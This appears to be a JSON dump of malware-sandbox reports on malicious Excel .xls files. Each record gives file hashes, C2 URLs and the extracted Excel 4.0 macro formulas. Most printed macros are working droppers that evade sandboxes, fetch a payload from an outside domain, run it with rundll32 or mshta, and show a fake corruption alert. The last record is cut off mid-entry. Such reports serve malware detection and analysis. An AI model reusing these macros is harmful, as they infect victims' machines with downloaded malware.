{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b1793f1fe17ed155223e8d1a88277ac8a301d0c9a4ebd35c2fd2945d66b2e39"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9b1793f1fe17ed155223e8d1a88277ac8a301d0c9a4ebd35c2fd2945d66b2e39","filesize":112128,"md5":"2458864f711210a660d434d404a51228","sha1":"dad003170f28f695ee165a4b5a1a80d36df92a56","sha256":"9b1793f1fe17ed155223e8d1a88277ac8a301d0c9a4ebd35c2fd2945d66b2e39","sha512":"f3b499d838ddb67bc6d05948605c0f3a50ac2934a73aa0122a5369aa1a34cdcd91e6452f09659cf742fcbf6e91988383f026a620a2eb252cd51fb20c8688154f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b1793f1fe17ed155223e8d1a88277ac8a301d0c9a4ebd35c2fd2945d66b2e39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b268689ba15c622abbd36a182171a6c87657d0d016ad9b58fda29aa39451865"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9b268689ba15c622abbd36a182171a6c87657d0d016ad9b58fda29aa39451865","filesize":185344,"md5":"edb8f34c62e5978f7e48bdd7300a1be9","sha1":"05a595208abcffab592eeebb3c0da04407c70ce3","sha256":"9b268689ba15c622abbd36a182171a6c87657d0d016ad9b58fda29aa39451865","sha512":"d04738525cb1a97f2c96c70ff9a9caaf895b69699b8ec9b296880596c6ff721fdfbac29603ad0c94abc675875367f17e9f06f00dcdd8b5589d5f13dd2729f8c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b268689ba15c622abbd36a182171a6c87657d0d016ad9b58fda29aa39451865.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b2aede74641487ec3bd36bdcdf68198e0828a38e1a9a98424ce9a3de9784aba"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9b2aede74641487ec3bd36bdcdf68198e0828a38e1a9a98424ce9a3de9784aba","filesize":209920,"md5":"e3fead2bc86252d1210c636574db6179","sha1":"0e1d077a33f1bfd7c09c7a366d5b631339264610","sha256":"9b2aede74641487ec3bd36bdcdf68198e0828a38e1a9a98424ce9a3de9784aba","sha512":"b369548980dbd47c66186414441a816b160dd23beb7a35ebea18dec435a38839f452cbdf3b8f88a42935c012010ff6038c937016f6e7a4357d157831d139e370","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b2aede74641487ec3bd36bdcdf68198e0828a38e1a9a98424ce9a3de9784aba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NFNdAtKeba\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b37a4fcfacf4e4a8d7aebeef9449dd042ce76d8c1fa51596ff740f206123447"},"analysis":{"reported":"2020-04-09T16:17:55Z","score":10},"files":[{"filename":"9b37a4fcfacf4e4a8d7aebeef9449dd042ce76d8c1fa51596ff740f206123447","filesize":168960,"md5":"bb13754f63c9ac50b7be6493d99e6a25","sha1":"c56a6d377cc81e491b1b57403918a7b55ce81adb","sha256":"9b37a4fcfacf4e4a8d7aebeef9449dd042ce76d8c1fa51596ff740f206123447","sha512":"d874ba2a5d7f7f020e37fe5a2c44740af8c3d97e2dafea35de1d45f666c5f9fbf2ac4e2b64777a3330180387a5a93613bb434421041be612ffd6dbce280a1269","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b37a4fcfacf4e4a8d7aebeef9449dd042ce76d8c1fa51596ff740f206123447.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nDEZTSQ50j\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b50069b22f6ef3a696f12f824cdc6e87243e91d96e55b30126731ab4add4519"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9b50069b22f6ef3a696f12f824cdc6e87243e91d96e55b30126731ab4add4519","filesize":185344,"md5":"e9c2f400f5b9bd9fc844de21e968e52e","sha1":"bd45d1383f55baf0061241e10c5a0facbd35599d","sha256":"9b50069b22f6ef3a696f12f824cdc6e87243e91d96e55b30126731ab4add4519","sha512":"4eb96d8eee761eeced6fd24ff686288f301d80016a61bb09890bd7797c26163f2fc266f7ba22810ecba33684e0296e78b96b190c98ffe20f1c0fef71cb69d785","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b50069b22f6ef3a696f12f824cdc6e87243e91d96e55b30126731ab4add4519.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b5b070284899bfd03f1a5458cc6069624e06a7f73e74c3e0dcc80af02cfe90e"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9b5b070284899bfd03f1a5458cc6069624e06a7f73e74c3e0dcc80af02cfe90e","filesize":167936,"md5":"23f2053d012dccaf4a83e8edd3ee4b88","sha1":"78100608933b4e19283233da2a57a72ef87e4569","sha256":"9b5b070284899bfd03f1a5458cc6069624e06a7f73e74c3e0dcc80af02cfe90e","sha512":"77e9b9d8cf68dbc959a9cf0b3405c36646734060ae89742b66a09a76ae9106cce0dbbb04a28eba8884f557b5838ce741fd8b69b79ae6a9163b08c03291975182","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b5b070284899bfd03f1a5458cc6069624e06a7f73e74c3e0dcc80af02cfe90e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"icLB0ZK9X7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b671ce338c7802c0f6101adfa5a3a27596473fee091db21b5a84b8c3b243f30"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9b671ce338c7802c0f6101adfa5a3a27596473fee091db21b5a84b8c3b243f30","filesize":142848,"md5":"dbbc4376592fdd65364e5eec208b3478","sha1":"1f21d9e566c94f8cdf0035b4e356712494962712","sha256":"9b671ce338c7802c0f6101adfa5a3a27596473fee091db21b5a84b8c3b243f30","sha512":"c2076e2d4c74c06cabd6f49dee2a5171f177a49b2f7034c5f0453de81a31faf98fd4f607a21a5be962f2dd9af030d6e35867bdfd961d026e5513cde916f68052","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b671ce338c7802c0f6101adfa5a3a27596473fee091db21b5a84b8c3b243f30.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"smjQzMMrsC\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9b78a7917db6042553e930c11877a58b4ea2a67485c0b3ea24a7cf82126974e6"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9b78a7917db6042553e930c11877a58b4ea2a67485c0b3ea24a7cf82126974e6","filesize":193024,"md5":"31fa18cd0dd6c20eb23784cd78f576ac","sha1":"8571d24b57eaec3abb097239ed2dac6a67e74c4b","sha256":"9b78a7917db6042553e930c11877a58b4ea2a67485c0b3ea24a7cf82126974e6","sha512":"5c644298edd8d6df3a6e1019aee8e2de7d06798581637155535ff1da8577caab7c6ce0cbc45c855cefe26c942e5bae2411bd9fa655e14fd30b1dbb0b89c6a611","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9b78a7917db6042553e930c11877a58b4ea2a67485c0b3ea24a7cf82126974e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"mshta https://loubanas.xyz/4YRdvZ2S\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9bb99870b4b811c64e02b59ef0c37f72948b9909577343dae00a4d2f8bd41cdc"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9bb99870b4b811c64e02b59ef0c37f72948b9909577343dae00a4d2f8bd41cdc","filesize":185344,"md5":"c2b25e4fdf3f0feaf4e1d517481659c6","sha1":"2936e96fe97b719f7f16b22625338fbf9136b857","sha256":"9bb99870b4b811c64e02b59ef0c37f72948b9909577343dae00a4d2f8bd41cdc","sha512":"dc2745f3ea3cb848aa9775ee1c7692bdea4a9c15b12c57ea48a4fe49f8f3c06c4ca3a66e50c5929fe0ad1bf6461423a5a831015737c84df44395f8ede99a6965","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9bb99870b4b811c64e02b59ef0c37f72948b9909577343dae00a4d2f8bd41cdc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9bf9af7b80edf55d222a94866ecac2a0ca6fa431a8dc146eeb2bd6b42b207341"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9bf9af7b80edf55d222a94866ecac2a0ca6fa431a8dc146eeb2bd6b42b207341","filesize":170496,"md5":"300d910c115ce674ad880c909bf227f1","sha1":"b36c5eaf2011021876816cf083032022486e07ac","sha256":"9bf9af7b80edf55d222a94866ecac2a0ca6fa431a8dc146eeb2bd6b42b207341","sha512":"821a6d24cc9829808c4aedc6e2352e1062c13c8b2880b0ed32e2e8e1d0b22d3fcec8316a3305dfd3bc154288aaa51838e8bb5088d28ad06c802ec2a0a8b229f9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9bf9af7b80edf55d222a94866ecac2a0ca6fa431a8dc146eeb2bd6b42b207341.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"adaSjwzGU7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9bfc1e4a00a91158ba254143516433a1bdda7a58689715d9ac5a6721ac6f9bf7"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9bfc1e4a00a91158ba254143516433a1bdda7a58689715d9ac5a6721ac6f9bf7","filesize":226304,"md5":"24af70249d40cbb05e4c8838680a6bce","sha1":"4dd793ac4b78347510abd7e4fa8d3cc10b2741cc","sha256":"9bfc1e4a00a91158ba254143516433a1bdda7a58689715d9ac5a6721ac6f9bf7","sha512":"af55a0f904fd9e3706deb63115f19b18a25c139e7e2070a4a3e64381d7e4898adac25341c877867750ffadc43ee885d60be6e4e7955683bfdc3143eb2e507222","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9bfc1e4a00a91158ba254143516433a1bdda7a58689715d9ac5a6721ac6f9bf7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jsp3PneXwz\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9c03c1a4ddc9efbbae6704fb18e4b439e44893d9a90265a50f2938b4a0ad1204"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9c03c1a4ddc9efbbae6704fb18e4b439e44893d9a90265a50f2938b4a0ad1204","filesize":116224,"md5":"cf82ef2275dad83c3ebffd009affb0a9","sha1":"a8eadafe924a5179615707cba96dbfa3635a6efe","sha256":"9c03c1a4ddc9efbbae6704fb18e4b439e44893d9a90265a50f2938b4a0ad1204","sha512":"01d1bff4dbe6a0fcd3fb1dc789882cf5cfb802bdf35fd3009653da973d9264c514de2cab3d63004acf116b303d24be684fa4e78d5679e2c532dcf9d64d7158e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9c03c1a4ddc9efbbae6704fb18e4b439e44893d9a90265a50f2938b4a0ad1204.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GJRl8KKnh6\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9c14692a17954694f3ab4a3ad75d087ffc16508c26f8a9b9332dc466b75cee2a"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9c14692a17954694f3ab4a3ad75d087ffc16508c26f8a9b9332dc466b75cee2a","filesize":206336,"md5":"eb4e6fca6229f86ec2ad44c2e5ae89cf","sha1":"3472c35734a5b7fee3eba28333e5d8ff436a394d","sha256":"9c14692a17954694f3ab4a3ad75d087ffc16508c26f8a9b9332dc466b75cee2a","sha512":"e38fba3eb8afe4c3fcdf221b26cdbf569aed2c505de89e4459528f3af4b92b0dcd3a19b425c960cac886214511a95751d1adcb4fc18d90d71beb41c52de1ef12","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9c14692a17954694f3ab4a3ad75d087ffc16508c26f8a9b9332dc466b75cee2a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"V4ZePR56XE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9c27a78e8fec5d484cfa78d19e3dafceb21f5bdeb445ce5436979de33c0a28b9"},"analysis":{"reported":"2020-04-09T16:17:56Z","score":10},"files":[{"filename":"9c27a78e8fec5d484cfa78d19e3dafceb21f5bdeb445ce5436979de33c0a28b9","filesize":209920,"md5":"1cb57a3c03623502f2a7f55a696bd4c4","sha1":"0418b296e885010bca9402ebc562e7d8b10a6463","sha256":"9c27a78e8fec5d484cfa78d19e3dafceb21f5bdeb445ce5436979de33c0a28b9","sha512":"c7b068f8608518709f3bd3c9480784cc78216d2a5eeed41ec9551401d399dae4986a1314c08be922839826b63c9093eb1071dd263025e5f8390723d7f203ae79","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9c27a78e8fec5d484cfa78d19e3dafceb21f5bdeb445ce5436979de33c0a28b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5LmHwfLt3J\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9c4b6851d5dde75639d7ec14c80e373c86d9ff986958bab22b795387f2f40eb5"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9c4b6851d5dde75639d7ec14c80e373c86d9ff986958bab22b795387f2f40eb5","filesize":170496,"md5":"801339ac3c35428d72b43ac8d80b973e","sha1":"794ee4f137416306ef2d2d725927ac0e76ca1023","sha256":"9c4b6851d5dde75639d7ec14c80e373c86d9ff986958bab22b795387f2f40eb5","sha512":"11b6310c4784ffab8887eec479248ed986102f7b5c32e216f63ef43f9a0c03f7153dbcfad72a28417f4b7cc5498cf94e15c4facb4066b880dad9351765026dc8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9c4b6851d5dde75639d7ec14c80e373c86d9ff986958bab22b795387f2f40eb5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WM4Ux2pUzz\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9c52b3d66f76b297039f557819a441e6a9dece2258c20022c16bab0220900173"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9c52b3d66f76b297039f557819a441e6a9dece2258c20022c16bab0220900173","filesize":206336,"md5":"2ded886fd494b4b29bae265b2eb1ec37","sha1":"afbf8d5c9ab4ebf8199e23479069a666c4ea758e","sha256":"9c52b3d66f76b297039f557819a441e6a9dece2258c20022c16bab0220900173","sha512":"11734f12aeca53ee9191dc3dccb18d4f1ccf1e2ebb7d639a1dd07999439de97b8093f3e45372d04ad028a43af0b4734e2b2601a5b8fcfe409339d5327f6b0458","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9c52b3d66f76b297039f557819a441e6a9dece2258c20022c16bab0220900173.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 